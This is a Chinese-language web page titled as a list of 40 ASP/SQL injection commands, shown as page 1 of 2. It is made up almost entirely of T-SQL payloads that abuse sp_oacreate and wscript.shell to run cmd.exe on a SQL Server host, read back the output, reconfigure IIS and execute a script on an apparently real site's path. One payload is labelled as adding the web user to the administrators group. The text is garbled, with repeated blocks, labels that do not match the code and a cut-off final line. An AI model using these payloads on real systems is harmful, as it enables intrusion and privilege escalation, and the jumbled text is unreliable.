ASP注入详细命令40条第1/2页
NT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate ''wscript.shell'',@shell output
EXEC sp_oamethod @shell,''run'',null,''cmd.exe /c dir c:\>c:\temp.txt'',''0'',''true''
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。
EXEC sp_oacreate ''scripting.filesystemobject'',@fso output
EXEC sp_oamethod @fso,''opentextfile'',@file out,''c:\temp.txt''
--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,''Readline'',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,''AtEndOfStream'',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
drop TABLE MYTMP
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate ''wscript.shell'',@shell output
EXEC sp_oamethod @shell,''run'',null,''cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt'',''0'',''true''
EXEC sp_oacreate ''scripting.filesystemobject'',@fso output
EXEC sp_oamethod @fso,''opentextfile'',@file out,''c:\temp.txt''
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,''Readline'',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,''AtEndOfStream'',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
以下是一行里面将WEB用户加到管理员组中:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate ''wscript.shell'',@shell output EXEC sp_oamethod @shell,''run'',null,''cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt'',''0'',''true'' EXEC sp_oacreate ''scripting.filesystemobject'',@fso output EXEC sp_oamethod @fso,''opentextfile'',@file out,''c:\temp.txt'' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,''Readline'',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,''AtEndOfStream'',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
以下是一行中执行EXE程序:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate ''wscript.shell'',@shell output EXEC sp_oamethod @shell,''run'',null,''cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt'',''0'',''true'' EXEC sp_oacreate ''scripting.filesystemobject'',@fso output EXEC sp_oamethod @fso,''opentextfile'',@file out,''c:\temp.txt'' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,''Readline'',@o
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate ''wscript.shell'',@shell output
EXEC sp_oamethod @shell,''run'',null,''cmd.exe /c dir c:\>c:\temp.txt'',''0'',''true''
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。
EXEC sp_oacreate ''scripting.filesystemobject'',@fso output
EXEC sp_oamethod @fso,''opentextfile'',@file out,''c:\temp.txt''
--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,''Readline'',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,''AtEndOfStream'',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
drop TABLE MYTMP
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate ''wscript.shell'',@shell output
EXEC sp_oamethod @shell,''run'',null,''cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt'',''0'',''true''
EXEC sp_oacreate ''scripting.filesystemobject'',@fso output
EXEC sp_oamethod @fso,''opentextfile'',@file out,''c:\temp.txt''
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,''Readline'',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,''AtEndOfStream'',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
以下是一行里面将WEB用户加到管理员组中:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate ''wscript.shell'',@shell output EXEC sp_oamethod @shell,''run'',null,''cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt'',''0'',''true'' EXEC sp_oacreate ''scripting.filesystemobject'',@fso output EXEC sp_oamethod @fso,''opentextfile'',@file out,''c:\temp.txt'' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,''Readline'',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,''AtEndOfStream'',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
以下是一行中执行EXE程序:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate ''wscript.shell'',@shell output EXEC sp_oamethod @shell,''run'',null,''cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt'',''0'',''true'' EXEC sp_oacreate ''scripting.filesystemobject'',@fso output EXEC sp_oamethod @fso,''opentextfile'',@file out,''c:\temp.txt'' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,''Readline'',@o